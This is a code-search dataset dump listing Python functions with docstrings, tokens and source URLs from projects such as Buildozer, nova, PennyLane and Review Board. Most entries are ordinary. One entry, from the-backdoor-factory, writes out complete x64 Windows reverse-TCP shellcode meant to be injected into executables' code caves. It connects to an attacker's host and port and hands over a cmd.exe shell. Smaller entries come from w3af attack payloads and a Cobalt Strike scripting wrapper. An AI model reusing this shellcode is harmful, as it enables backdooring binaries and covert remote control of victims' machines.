nwo
stringlengths
5
106
sha
stringlengths
40
40
path
stringlengths
4
174
language
stringclasses
1 value
identifier
stringlengths
1
140
parameters
stringlengths
0
87.7k
argument_list
stringclasses
1 value
return_statement
stringlengths
0
426k
docstring
stringlengths
0
64.3k
docstring_summary
stringlengths
0
26.3k
docstring_tokens
list
function
stringlengths
18
4.83M
function_tokens
list
url
stringlengths
83
304
kivy/buildozer
04f5d0076ea7931fc8aa0588f6a4c81810e2699e
buildozer/__init__.py
python
Buildozer.namify
(self, name)
return re.sub(r'[^a-zA-Z0-9_\-]', '_', name)
Return a "valid" name from a name with lot of invalid chars (allowed characters: a-z, A-Z, 0-9, -, _)
Return a "valid" name from a name with lot of invalid chars (allowed characters: a-z, A-Z, 0-9, -, _)
[ "Return", "a", "valid", "name", "from", "a", "name", "with", "lot", "of", "invalid", "chars", "(", "allowed", "characters", ":", "a", "-", "z", "A", "-", "Z", "0", "-", "9", "-", "_", ")" ]
def namify(self, name): '''Return a "valid" name from a name with lot of invalid chars (allowed characters: a-z, A-Z, 0-9, -, _) ''' return re.sub(r'[^a-zA-Z0-9_\-]', '_', name)
[ "def", "namify", "(", "self", ",", "name", ")", ":", "return", "re", ".", "sub", "(", "r'[^a-zA-Z0-9_\\-]'", ",", "'_'", ",", "name", ")" ]
https://github.com/kivy/buildozer/blob/04f5d0076ea7931fc8aa0588f6a4c81810e2699e/buildozer/__init__.py#L819-L823
andresriancho/w3af
cd22e5252243a87aaa6d0ddea47cf58dacfe00a9
w3af/plugins/attack/payloads/payloads/apache_root_directory.py
python
apache_root_directory.run_read
(self)
[]
def run_read(self): api_result = self.api_read() if not api_result['apache_root_directory']: return 'Apache root directory not found.' else: rows = [] rows.append(['Apache root directories']) rows.append([]) for key_name in api_result: for directory in api_result[key_name]: rows.append([directory, ]) result_table = table(rows) result_table.draw(80) return rows
[ "def", "run_read", "(", "self", ")", ":", "api_result", "=", "self", ".", "api_read", "(", ")", "if", "not", "api_result", "[", "'apache_root_directory'", "]", ":", "return", "'Apache root directory not found.'", "else", ":", "rows", "=", "[", "]", "rows", "...
https://github.com/andresriancho/w3af/blob/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/plugins/attack/payloads/payloads/apache_root_directory.py#L57-L71
garrickbrazil/M3D-RPN
bf204e3f95f647d73a132535385119b12c8d6c36
lib/augmentations.py
python
Augmentation.__init__
(self, conf)
[]
def __init__(self, conf): self.mean = conf.image_means self.stds = conf.image_stds self.size = conf.crop_size self.mirror_prob = conf.mirror_prob self.distort_prob = conf.distort_prob if conf.distort_prob <= 0: self.augment = Compose([ ConvertToFloat(), RandomMirror(self.mirror_prob), Resize(self.size), Normalize(self.mean, self.stds) ]) else: self.augment = Compose([ ConvertToFloat(), PhotometricDistort(self.distort_prob), RandomMirror(self.mirror_prob), Resize(self.size), Normalize(self.mean, self.stds) ])
[ "def", "__init__", "(", "self", ",", "conf", ")", ":", "self", ".", "mean", "=", "conf", ".", "image_means", "self", ".", "stds", "=", "conf", ".", "image_stds", "self", ".", "size", "=", "conf", ".", "crop_size", "self", ".", "mirror_prob", "=", "co...
https://github.com/garrickbrazil/M3D-RPN/blob/bf204e3f95f647d73a132535385119b12c8d6c36/lib/augmentations.py#L337-L359
sabnzbd/sabnzbd
52d21e94d3cc6e30764a833fe2a256783d1a8931
sabnzbd/bpsmeter.py
python
this_week
(t: float)
return time.mktime(monday)
Return timestamp for start of this week (monday)
Return timestamp for start of this week (monday)
[ "Return", "timestamp", "for", "start", "of", "this", "week", "(", "monday", ")" ]
def this_week(t: float) -> float: """Return timestamp for start of this week (monday)""" while 1: tm = time.localtime(t) if tm.tm_wday == 0: break t -= DAY monday = (tm.tm_year, tm.tm_mon, tm.tm_mday, 0, 0, 0, 0, 0, tm.tm_isdst) return time.mktime(monday)
[ "def", "this_week", "(", "t", ":", "float", ")", "->", "float", ":", "while", "1", ":", "tm", "=", "time", ".", "localtime", "(", "t", ")", "if", "tm", ".", "tm_wday", "==", "0", ":", "break", "t", "-=", "DAY", "monday", "=", "(", "tm", ".", ...
https://github.com/sabnzbd/sabnzbd/blob/52d21e94d3cc6e30764a833fe2a256783d1a8931/sabnzbd/bpsmeter.py#L48-L56
secretsquirrel/the-backdoor-factory
9972ac64e2860351a2132e56e6ac191af9b978bb
intel/WinIntelPE64.py
python
winI64_shellcode.iat_reverse_tcp_inline
(self, flItms, CavesPicked={})
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
Position dependent shellcode that uses API thunks of LoadLibraryA and GetProcAddress to find and load APIs for callback to C2.
Position dependent shellcode that uses API thunks of LoadLibraryA and GetProcAddress to find and load APIs for callback to C2.
[ "Position", "dependent", "shellcode", "that", "uses", "API", "thunks", "of", "LoadLibraryA", "and", "GetProcAddress", "to", "find", "and", "load", "APIs", "for", "callback", "to", "C2", "." ]
def iat_reverse_tcp_inline(self, flItms, CavesPicked={}): """ Position dependent shellcode that uses API thunks of LoadLibraryA and GetProcAddress to find and load APIs for callback to C2. """ flItms['apis_needed'] = ['LoadLibraryA', 'GetProcAddress'] for api in flItms['apis_needed']: if api not in flItms: return False if self.PORT is None: print ("This payload requires the PORT parameter -P") return False if self.HOST is None: print "This payload requires a HOST parameter -H" return False self.shellcode1 = "\xfc" # CLD self.shellcode1 += "\x49\xBE" # mov value below to r14 #Think about putting the LOADLIBA and GETPROCADDRESS in rX regs if flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0: self.shellcode1 += struct.pack("<Q", 0xffffffff + (flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1)) else: self.shellcode1 += struct.pack("<Q", flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase'])) #RDX holds entry point self.shellcode1 += "\x49\x01\xD6" # add r14 + RDX self.shellcode1 += "\x49\xBF" # mov value below to r15 if flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0: self.shellcode1 += struct.pack("<Q", 0xffffffff + (flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1)) else: self.shellcode1 += struct.pack("<Q", flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase'])) self.shellcode1 += "\x49\x01\xD7" # add r15 + RDX #LoadLibraryA in r14 #GetProcAddress in r15 ''' Winx64 asm calling convention RCX, RDX, R8, R9 for the first four integer or pointer arguments (in that order), and XMM0, XMM1, XMM2, XMM3 are used for floating point arguments. Additional arguments are pushed onto the stack (right to left). Integer return values (similar to x86) are returned in RAX if 64 bits or less. Floating point return values are returned in XMM0. Parameters less than 64 bits long are not zero extended; the high bits are not zeroed. The caller reserves space on the stack (unlike x86) rbx rbp r12 r13 r14: LoadLibraryA r15: GetProcAddress ''' self.shellcode1 += ("\x49\xbb\x77\x73\x32\x5F\x33\x32\x00\x00" # mov r11, ws2_32 "\x41\x53" # push r11 "\x49\x89\xE3" # mov r11, rsp "\x48\x81\xEC\xA0\x01\x00\x00" # sub rsp, 408+8 # size of WSAData "\x48\x89\xE6" # mov rsi, rsp pointer to WSAData struct "\x48\xBF\x02\x00" ) self.shellcode1 += struct.pack('!H', self.PORT) self.shellcode1 += self.pack_ip_addresses() self.shellcode1 += ("\x57" # push rdi "\x48\x89\xE7" # mov rdi, rsp pointer to data "\x4C\x89\xD9" # mov rcx, r11 #ws2_32 "\x48\x83\xEC\x20" # sub rsp, 0x20 "\x41\xff\x16" # call qword ptr [r14] ; LoadLibA "\x49\x89\xC5" # mov r13, rax ; handle ws2_32 to r13 # handle ws2_32 to r13 "\x48\x89\xC1" # mov rcx, rax "\xeb\x0c" # short jmp over api "\x57\x53\x41\x53\x74\x61" # WSAStartup "\x72\x74\x75\x70\x00\x00" # ... "\x48\x8D\x15\xED\xFF\xFF\xFF" # lea rdx, [rip-19] "\x48\x83\xEC\x20" # sub rsp, 0x20 "\x41\xFF\x17" # Call qword ptr [r15] ; GetProcAddr "\x48\x95" # xchg rbp, rax ; mov wsastartup to rbp # wsastartup to rbp "\xeb\x0c" # jmp over WSASocketA "\x57\x53\x41\x53\x6f\x63" # WSASocketA "\x6b\x65\x74\x41\x00\x00" # "\x48\x8D\x15\xED\xFF\xFF\xFF" # lea rdx, [rip-19] "\x4C\x89\xE9" # mov rcx, r13 "\x48\x83\xEC\x20" # sub rsp, 0x20 "\x41\xFF\x17" # call qword ptr [r15] GetProcAddr WSASocketA "\x49\x94" # xchg r12, rax ; mov WSASocketA to r12 # WSASocketA to r12 "\x48\x89\xF2" # mov rdx, rsi ; mov point to struct "\x68\x01\x01\x00\x00" # push 0x0101 "\x59" # pop rcx "\x48\x83\xEC\x20" # sub rsp, 0x20 "\xff\xd5" # call rbp ; WSAStartup(0x0101, &WSAData); "\x50" # push rax "\x50" # push rax "\x4D\x31\xC0" # xor r8, r8 "\x4D\x31\xC9" # xor r9, r9 "\x48\xff\xC0" # inc rax "\x48\x89\xC2" # mov rdx, rax "\x48\xff\xC0" # inc rax "\x48\x89\xC1" # mov rdx, rax "\x48\x83\xEC\x20" # sub rsp, 0x20 "\x41\xFF\xD4" # call r12 ;WSASocketA(AF_INT, SOCK_STREAM, 0 0 0 0) "\x49\x94" # xchg r12, rax ; mov socket to r12 # get connect "\x48\xBA\x63\x6F\x6E\x6E\x65\x63\x74\x00" # mov rdx, "connect\x00" "\x52" # push rdx "\x48\x89\xE2" # mov rdx, rsp "\x4C\x89\xE9" # mov rcx, r13; ws2_32 handle "\x48\x83\xEC\x20" # sub rsp, 0x20 "\x41\xFF\x17" # call qword ptr [r15] ;GetProcAddr connect "\x48\x89\xC3" # mov rbx, rax ;connect api "\x6A\x10" # push 16 "\x41\x58" # pop r8 "\x48\x89\xFA" # mov rdx, rdi "\x4C\x89\xE1" # mov rcx, r12 "\x48\x83\xEC\x20" # sub rsp, 0x20 "\xFF\xD3" # call rbx ;connect (s, &sockaddr, 16) "\x48\x81\xC4\xb8\x02\x00\x00" # add rsp, 0x2b8 ) #socket is in r12 #breakupvar is the distance between codecaves breakupvar = eat_code_caves(flItms, 0, 1) if flItms['cave_jumping'] is True: self.shellcode1 += "\xe9" # JMP opcode if breakupvar > 0: if len(self.shellcode1) < breakupvar: self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) - len(self.shellcode1) - 4).rstrip("L")), 16)) else: self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) - breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16)) else: self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) - len(self.shellcode1) - 3) self.shellcode2 = ("\xeb\x09" # jump over kernel32 "\x6b\x65\x72\x6e\x65\x6c\x33\x32\x00" # kernel32,00 "\x48\x8D\x0D\xF0\xFF\xFF\xFF" # lea rcx, [rip-4] "\x48\x83\xEC\x20" # sub rsp, 20 "\x41\xFF\x16" # call qword ptr [r14] # getprocaddress CreateProcessA "\x49\x89\xC5" # mov r13, rax ; mov kernel32 to r13 "\x48\x89\xC1" # mov rcx, rax "\xeb\x0f" # jump over CreateProcessA,0 "\x43\x72\x65\x61\x74\x65\x50" # CreateProcessA "\x72\x6f\x63\x65\x73\x73\x41\x00" # ... "\x48\x8D\x15\xEA\xFF\xFF\xFF" # lea rdx, [rip - 22] "\x48\x83\xEC\x20" # sub rsp, 20 "\x41\xFF\x17" # call qword ptr [r15] GetProcAddr CreateProcessA # CreateProcessesA in rax "\x48\x89\xC7" # mov rdi, rax ;mov CreateProcessA to rdi "\x49\x87\xFC" # xchg r12, rdi (socket handle for CreateProcessA) # socket is in rdi # shell: "\x49\xb8\x63\x6d\x64\x00\x00\x00\x00\x00" # mov r8, 'cmd' "\x41\x50" # push r8 ; an extra push for alignment "\x41\x50" # push r8 ; push our command line: 'cmd',0 "\x48\x89\xe2" # mov rdx, rsp ; save a pointer to the command line "\x57" # push rdi ; our socket becomes the shells hStdError "\x57" # push rdi ; our socket becomes the shells hStdOutput "\x57" # push rdi ; our socket becomes the shells hStdInput "\x4d\x31\xc0" # xor r8, r8 ; Clear r8 for all the NULL's we need to push "\x6a\x0d" # push byte 13 ; We want to place 104 (13 * 8) null bytes onto the stack "\x59" # pop rcx ; Set RCX for the loop # 1 push_loop: ; "\x41\x50" # push r8 ; push a null qword "\xe2\xfc" # loop push_loop ; keep looping untill we have pushed enough nulls "\x66\xc7\x44\x24\x54\x01\x01" # mov word [rsp+84], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW "\x48\x8d\x44\x24\x18" # lea rax, [rsp+24] ; Set RAX as a pointer to our STARTUPINFO Structure "\xc6\x00\x68" # mov byte [rax], 104 ; Set the size of the STARTUPINFO Structure "\x48\x89\xe6" # mov rsi, rsp ; Save the pointer to the PROCESS_INFORMATION Structure # ; 1 perform the call to CreateProcessA "\x56" # push rsi ; Push the pointer to the PROCESS_INFORMATION Structure "\x50" # push rax ; Push the pointer to the STARTUPINFO Structure "\x41\x50" # push r8 ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent "\x41\x50" # push r8 ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent "\x41\x50" # push r8 ; We dont specify any dwCreationFlags "\x49\xff\xc0" # inc r8 ; Increment r8 to be one "\x41\x50" # push r8 ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent "\x49\xff\xc8" # dec r8 ; Decrement r8 (third param) back down to zero "\x4d\x89\xc1" # mov r9, r8 ; Set fourth param, lpThreadAttributes to NULL # ; r8 = lpProcessAttributes (NULL) # ; rdx = the lpCommandLine to point to "cmd",0 "\x4c\x89\xc1" # mov rcx, r8 ; Set lpApplicationName to NULL as we are using the command line param instead "\x48\x83\xEC\x20" # sub rsp, 20 "\x41\xFF\xD4" # call r12 ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi ); # perform the call to WaitForSingleObject "\xeb\x14" # jmp over WaitForSingleObject "\x57\x61\x69\x74\x46\x6f\x72\x53" # WaitForSingleObject "\x69\x6e\x67\x6c\x65\x4f\x62\x6a" # ... "\x65\x63\x74\x00" # ... "\x48\x8D\x15\xE5\xFF\xFF\xFF" # lea rdx, [rip-27] "\x4C\x89\xE9" # mov rcx, r13 ; mov kernel32 handle to rcx "\x48\x83\xEC\x20" # sub rsp, 0x20 "\x41\xFF\x17" # call qword ptr [r15] GetProcAddr WaitForSingleObject # WaitForSingleObject is in rax "\x48\x31\xd2" # xor rdx, rdx "\x8b\x0e" # mov ecx, dword [rsi] ; set the first param to the handle from our PROCESS_INFORMATION.hProcess "\x48\x83\xEC\x20" # sub rsp, 0x20 "\xFF\xD0" # call rax; WaitForSingleObject( pi.hProcess, INFINITE ); #Fix Up rsp "\x48\x81\xC4\x50\x01\x00\x00" # add rsp, 0x150 ) self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
[ "def", "iat_reverse_tcp_inline", "(", "self", ",", "flItms", ",", "CavesPicked", "=", "{", "}", ")", ":", "flItms", "[", "'apis_needed'", "]", "=", "[", "'LoadLibraryA'", ",", "'GetProcAddress'", "]", "for", "api", "in", "flItms", "[", "'apis_needed'", "]", ...
https://github.com/secretsquirrel/the-backdoor-factory/blob/9972ac64e2860351a2132e56e6ac191af9b978bb/intel/WinIntelPE64.py#L930-L1139
reviewboard/reviewboard
7395902e4c181bcd1d633f61105012ffb1d18e1b
reviewboard/hostingsvcs/utils/paginator.py
python
APIPaginator.__init__
(self, client, url, query_params={}, *args, **kwargs)
Initialize the paginator. Once initialized, the first page will be fetched automatically. Args: client (reviewboard.hostingsvcs.service.HostingServiceClient): The hosting service client used to make requests. url (unicode): The URL used to make requests. query_params (dict): The query parameters to append to the URL for requests. This will be updated with :py:attr:`start_query_param` and :py:attr:`per_page_query_param`, if set. *args (tuple): Positional arguments for the parent constructor. **kwargs (dict): Keyword arguments for the parent constructor.
Initialize the paginator.
[ "Initialize", "the", "paginator", "." ]
def __init__(self, client, url, query_params={}, *args, **kwargs): """Initialize the paginator. Once initialized, the first page will be fetched automatically. Args: client (reviewboard.hostingsvcs.service.HostingServiceClient): The hosting service client used to make requests. url (unicode): The URL used to make requests. query_params (dict): The query parameters to append to the URL for requests. This will be updated with :py:attr:`start_query_param` and :py:attr:`per_page_query_param`, if set. *args (tuple): Positional arguments for the parent constructor. **kwargs (dict): Keyword arguments for the parent constructor. """ super(APIPaginator, self).__init__(*args, **kwargs) self.client = client self.url = url self.prev_url = None self.next_url = None self.page_headers = None # Augment the URL with the provided query parameters. query_params = query_params.copy() if self.start_query_param and self.start: query_params[self.start_query_param] = self.start if self.per_page_query_param and self.per_page: query_params[self.per_page_query_param] = self.per_page self.request_kwargs.setdefault('query', {}).update(query_params) self._fetch_page()
[ "def", "__init__", "(", "self", ",", "client", ",", "url", ",", "query_params", "=", "{", "}", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "super", "(", "APIPaginator", ",", "self", ")", ".", "__init__", "(", "*", "args", ",", "*", "*", ...
https://github.com/reviewboard/reviewboard/blob/7395902e4c181bcd1d633f61105012ffb1d18e1b/reviewboard/hostingsvcs/utils/paginator.py#L221-L263
mlcommons/training
4a4d5a0b7efe99c680306b1940749211d4238a84
rnn_translator/pytorch/seq2seq/train/fp_optimizers.py
python
Fp16Optimizer.__init__
(self, fp16_model, grad_clip=float('inf'), loss_scale=8192, dls_downscale=2, dls_upscale=2, dls_upscale_interval=128)
Constructor for the Fp16Optimizer. :param fp16_model: model (previously casted to half) :param grad_clip: coefficient for gradient clipping, max L2 norm of the gradients :param loss_scale: initial loss scale :param dls_downscale: loss downscale factor, loss scale is divided by this factor when NaN/INF occurs in the gradients :param dls_upscale: loss upscale factor, loss scale is multiplied by this factor if previous dls_upscale_interval batches finished successfully :param dls_upscale_interval: interval for loss scale upscaling
Constructor for the Fp16Optimizer.
[ "Constructor", "for", "the", "Fp16Optimizer", "." ]
def __init__(self, fp16_model, grad_clip=float('inf'), loss_scale=8192, dls_downscale=2, dls_upscale=2, dls_upscale_interval=128): """ Constructor for the Fp16Optimizer. :param fp16_model: model (previously casted to half) :param grad_clip: coefficient for gradient clipping, max L2 norm of the gradients :param loss_scale: initial loss scale :param dls_downscale: loss downscale factor, loss scale is divided by this factor when NaN/INF occurs in the gradients :param dls_upscale: loss upscale factor, loss scale is multiplied by this factor if previous dls_upscale_interval batches finished successfully :param dls_upscale_interval: interval for loss scale upscaling """ logging.info('Initializing fp16 optimizer') self.initialize_model(fp16_model) self.since_last_invalid = 0 self.loss_scale = loss_scale self.dls_downscale = dls_downscale self.dls_upscale = dls_upscale self.dls_upscale_interval = dls_upscale_interval self.grad_clip = grad_clip
[ "def", "__init__", "(", "self", ",", "fp16_model", ",", "grad_clip", "=", "float", "(", "'inf'", ")", ",", "loss_scale", "=", "8192", ",", "dls_downscale", "=", "2", ",", "dls_upscale", "=", "2", ",", "dls_upscale_interval", "=", "128", ")", ":", "loggin...
https://github.com/mlcommons/training/blob/4a4d5a0b7efe99c680306b1940749211d4238a84/rnn_translator/pytorch/seq2seq/train/fp_optimizers.py#L37-L61
openstack/nova
b49b7663e1c3073917d5844b81d38db8e86d05c4
nova/compute/manager.py
python
ComputeVirtAPI.update_compute_provider_status
(self, context, rp_uuid, enabled)
Used to add/remove the COMPUTE_STATUS_DISABLED trait on the provider :param context: nova auth RequestContext :param rp_uuid: UUID of a compute node resource provider in Placement :param enabled: True if the node is enabled in which case the trait would be removed, False if the node is disabled in which case the trait would be added. :raises: ResourceProviderTraitRetrievalFailed :raises: ResourceProviderUpdateConflict :raises: ResourceProviderUpdateFailed :raises: TraitRetrievalFailed :raises: keystoneauth1.exceptions.ClientException
Used to add/remove the COMPUTE_STATUS_DISABLED trait on the provider
[ "Used", "to", "add", "/", "remove", "the", "COMPUTE_STATUS_DISABLED", "trait", "on", "the", "provider" ]
def update_compute_provider_status(self, context, rp_uuid, enabled): """Used to add/remove the COMPUTE_STATUS_DISABLED trait on the provider :param context: nova auth RequestContext :param rp_uuid: UUID of a compute node resource provider in Placement :param enabled: True if the node is enabled in which case the trait would be removed, False if the node is disabled in which case the trait would be added. :raises: ResourceProviderTraitRetrievalFailed :raises: ResourceProviderUpdateConflict :raises: ResourceProviderUpdateFailed :raises: TraitRetrievalFailed :raises: keystoneauth1.exceptions.ClientException """ trait_name = os_traits.COMPUTE_STATUS_DISABLED # Get the current traits (and generation) for the provider. # TODO(mriedem): Leverage the ProviderTree cache in get_provider_traits trait_info = self.reportclient.get_provider_traits(context, rp_uuid) # If the host is enabled, remove the trait (if set), else add # the trait if it doesn't already exist. original_traits = trait_info.traits new_traits = None if enabled and trait_name in original_traits: new_traits = original_traits - {trait_name} LOG.debug('Removing trait %s from compute node resource ' 'provider %s in placement.', trait_name, rp_uuid) elif not enabled and trait_name not in original_traits: new_traits = original_traits | {trait_name} LOG.debug('Adding trait %s to compute node resource ' 'provider %s in placement.', trait_name, rp_uuid) if new_traits is not None: self.reportclient.set_traits_for_provider( context, rp_uuid, new_traits, generation=trait_info.generation)
[ "def", "update_compute_provider_status", "(", "self", ",", "context", ",", "rp_uuid", ",", "enabled", ")", ":", "trait_name", "=", "os_traits", ".", "COMPUTE_STATUS_DISABLED", "# Get the current traits (and generation) for the provider.", "# TODO(mriedem): Leverage the ProviderTr...
https://github.com/openstack/nova/blob/b49b7663e1c3073917d5844b81d38db8e86d05c4/nova/compute/manager.py#L495-L528
PennyLaneAI/pennylane
1275736f790ced1d778858ed383448d4a43a4cdd
pennylane/hf/hartree_fock.py
python
hf_energy
(mol)
return energy
r"""Return a function that computes the Hartree-Fock energy. Args: mol (Molecule): the molecule object Returns: function: function that computes the Hartree-Fock energy **Example** >>> symbols = ['H', 'H'] >>> geometry = np.array([[0.0, 0.0, 0.0], [0.0, 0.0, 1.0]], requires_grad = False) >>> alpha = np.array([[3.42525091, 0.62391373, 0.1688554], >>> [3.42525091, 0.62391373, 0.1688554]], requires_grad=True) >>> mol = qml.hf.Molecule(symbols, geometry, alpha=alpha) >>> args = [alpha] >>> hf_energy(mol)(*args) -1.065999461545263
r"""Return a function that computes the Hartree-Fock energy.
[ "r", "Return", "a", "function", "that", "computes", "the", "Hartree", "-", "Fock", "energy", "." ]
def hf_energy(mol): r"""Return a function that computes the Hartree-Fock energy. Args: mol (Molecule): the molecule object Returns: function: function that computes the Hartree-Fock energy **Example** >>> symbols = ['H', 'H'] >>> geometry = np.array([[0.0, 0.0, 0.0], [0.0, 0.0, 1.0]], requires_grad = False) >>> alpha = np.array([[3.42525091, 0.62391373, 0.1688554], >>> [3.42525091, 0.62391373, 0.1688554]], requires_grad=True) >>> mol = qml.hf.Molecule(symbols, geometry, alpha=alpha) >>> args = [alpha] >>> hf_energy(mol)(*args) -1.065999461545263 """ def energy(*args): r"""Compute the Hartree-Fock energy. Args: args (array[array[float]]): initial values of the differentiable parameters Returns: float: the Hartree-Fock energy """ _, coeffs, fock_matrix, h_core, _ = generate_scf(mol)(*args) e_rep = nuclear_energy(mol.nuclear_charges, mol.coordinates)(*args) e_elec = anp.einsum( "pq,qp", fock_matrix + h_core, molecular_density_matrix(mol.n_electrons, coeffs) ) return e_elec + e_rep return energy
[ "def", "hf_energy", "(", "mol", ")", ":", "def", "energy", "(", "*", "args", ")", ":", "r\"\"\"Compute the Hartree-Fock energy.\n\n Args:\n args (array[array[float]]): initial values of the differentiable parameters\n\n Returns:\n float: the Hartree-Fock...
https://github.com/PennyLaneAI/pennylane/blob/1275736f790ced1d778858ed383448d4a43a4cdd/pennylane/hf/hartree_fock.py#L226-L263
pjkundert/cpppo
4c217b6c06b88bede3888cc5ea2731f271a95086
tools/waits.py
python
existence.truth
( self, predicate )
return True
Waits for predicate to evaluate. We'll keep doubling the delay (exponential backoff) 'til we get to 1/2 the timeout, when we'll begin using 1/2 the remaining timeout. The only valid states are that that the file doesn't exist, or that it exists and is readable. Everything else (eg. exists but unreadable, some other I/O error) is indeterminate, and results in the existence detection continuing (until timeout).
Waits for predicate to evaluate. We'll keep doubling the delay (exponential backoff) 'til we get to 1/2 the timeout, when we'll begin using 1/2 the remaining timeout.
[ "Waits", "for", "predicate", "to", "evaluate", ".", "We", "ll", "keep", "doubling", "the", "delay", "(", "exponential", "backoff", ")", "til", "we", "get", "to", "1", "/", "2", "the", "timeout", "when", "we", "ll", "begin", "using", "1", "/", "2", "t...
def truth( self, predicate ): """Waits for predicate to evaluate. We'll keep doubling the delay (exponential backoff) 'til we get to 1/2 the timeout, when we'll begin using 1/2 the remaining timeout. The only valid states are that that the file doesn't exist, or that it exists and is readable. Everything else (eg. exists but unreadable, some other I/O error) is indeterminate, and results in the existence detection continuing (until timeout). """ delay = 0 found = None while found != self.presence: found = bool(predicate()) if found != self.presence: now = misc.timer() if self.timeout is not None: # A finite timeout if now >= self.started + self.timeout: log.info( "waits for truth: %r; timeout of %s exceeded" % ( predicate, None if self.timeout is None else "%.3fs" % self.timeout )) return False if self.idle_service: self.idle_service() delay = self.delay( target=delay*2, now=now ) log.info( "waits for truth for %7.3fs: %r", delay, predicate ) time.sleep( delay ) return True
[ "def", "truth", "(", "self", ",", "predicate", ")", ":", "delay", "=", "0", "found", "=", "None", "while", "found", "!=", "self", ".", "presence", ":", "found", "=", "bool", "(", "predicate", "(", ")", ")", "if", "found", "!=", "self", ".", "presen...
https://github.com/pjkundert/cpppo/blob/4c217b6c06b88bede3888cc5ea2731f271a95086/tools/waits.py#L185-L210
mautrix/telegram
9f48eca5a6654bc38012cb761ecaaaf416aabdd0
mautrix_telegram/portal.py
python
Portal.try_handle_telegram_reactions
( self, source: au.AbstractUser, msg_id: TelegramID, data: MessageReactions, dbm: DBMessage | None = None, )
[]
async def try_handle_telegram_reactions( self, source: au.AbstractUser, msg_id: TelegramID, data: MessageReactions, dbm: DBMessage | None = None, ) -> None: try: await self.handle_telegram_reactions(source, msg_id, data, dbm) except Exception: self.log.exception(f"Error handling reactions in message {msg_id}")
[ "async", "def", "try_handle_telegram_reactions", "(", "self", ",", "source", ":", "au", ".", "AbstractUser", ",", "msg_id", ":", "TelegramID", ",", "data", ":", "MessageReactions", ",", "dbm", ":", "DBMessage", "|", "None", "=", "None", ",", ")", "->", "No...
https://github.com/mautrix/telegram/blob/9f48eca5a6654bc38012cb761ecaaaf416aabdd0/mautrix_telegram/portal.py#L2766-L2776
DSE-MSU/DeepRobust
2bcde200a5969dae32cddece66206a52c87c43e8
deeprobust/image/netmodels/densenet.py
python
DenseNet.__init__
(self, block, nblocks, growth_rate=12, reduction=0.5, num_classes=10)
[]
def __init__(self, block, nblocks, growth_rate=12, reduction=0.5, num_classes=10): super(DenseNet, self).__init__() self.growth_rate = growth_rate num_planes = 2*growth_rate self.conv1 = nn.Conv2d(3, num_planes, kernel_size=3, padding=1, bias=False) self.dense1 = self._make_dense_layers(block, num_planes, nblocks[0]) num_planes += nblocks[0]*growth_rate out_planes = int(math.floor(num_planes*reduction)) self.trans1 = Transition(num_planes, out_planes) num_planes = out_planes self.dense2 = self._make_dense_layers(block, num_planes, nblocks[1]) num_planes += nblocks[1]*growth_rate out_planes = int(math.floor(num_planes*reduction)) self.trans2 = Transition(num_planes, out_planes) num_planes = out_planes self.dense3 = self._make_dense_layers(block, num_planes, nblocks[2]) num_planes += nblocks[2]*growth_rate out_planes = int(math.floor(num_planes*reduction)) self.trans3 = Transition(num_planes, out_planes) num_planes = out_planes self.dense4 = self._make_dense_layers(block, num_planes, nblocks[3]) num_planes += nblocks[3]*growth_rate self.bn = nn.BatchNorm2d(num_planes) self.linear = nn.Linear(num_planes, num_classes)
[ "def", "__init__", "(", "self", ",", "block", ",", "nblocks", ",", "growth_rate", "=", "12", ",", "reduction", "=", "0.5", ",", "num_classes", "=", "10", ")", ":", "super", "(", "DenseNet", ",", "self", ")", ".", "__init__", "(", ")", "self", ".", ...
https://github.com/DSE-MSU/DeepRobust/blob/2bcde200a5969dae32cddece66206a52c87c43e8/deeprobust/image/netmodels/densenet.py#L48-L77
KhronosGroup/NNEF-Tools
c913758ca687dab8cb7b49e8f1556819a2d0ca25
nnef_tools/io/tf/lite/flatbuffers/MatrixDiagOptions.py
python
MatrixDiagOptionsEnd
(builder)
return builder.EndObject()
[]
def MatrixDiagOptionsEnd(builder): return builder.EndObject()
[ "def", "MatrixDiagOptionsEnd", "(", "builder", ")", ":", "return", "builder", ".", "EndObject", "(", ")" ]
https://github.com/KhronosGroup/NNEF-Tools/blob/c913758ca687dab8cb7b49e8f1556819a2d0ca25/nnef_tools/io/tf/lite/flatbuffers/MatrixDiagOptions.py#L28-L28
dcsync/pycobalt
d3a630bfadaeeb6c99aad28f226abe48f6b4acca
pycobalt/aggressor.py
python
ssh_command_register
(*args, fork=None, sync=True)
return engine.call('ssh_command_register', args, fork=fork, sync=sync)
r""" Documentation from https://www.cobaltstrike.com/aggressor-script/functions.html: Register help information for an SSH console command. Arguments $1 - the command $2 - the short description of the command $3 - the long-form help for the command. Example ssh_alis echo { blog($1, "You typed: " . substr($1, 5)); } ssh_command_register( "echo", "echo posts to the current session's log", "Synopsis: echo [arguments]\n\nLog arguments to the SSH console");
r""" Documentation from https://www.cobaltstrike.com/aggressor-script/functions.html:
[ "r", "Documentation", "from", "https", ":", "//", "www", ".", "cobaltstrike", ".", "com", "/", "aggressor", "-", "script", "/", "functions", ".", "html", ":" ]
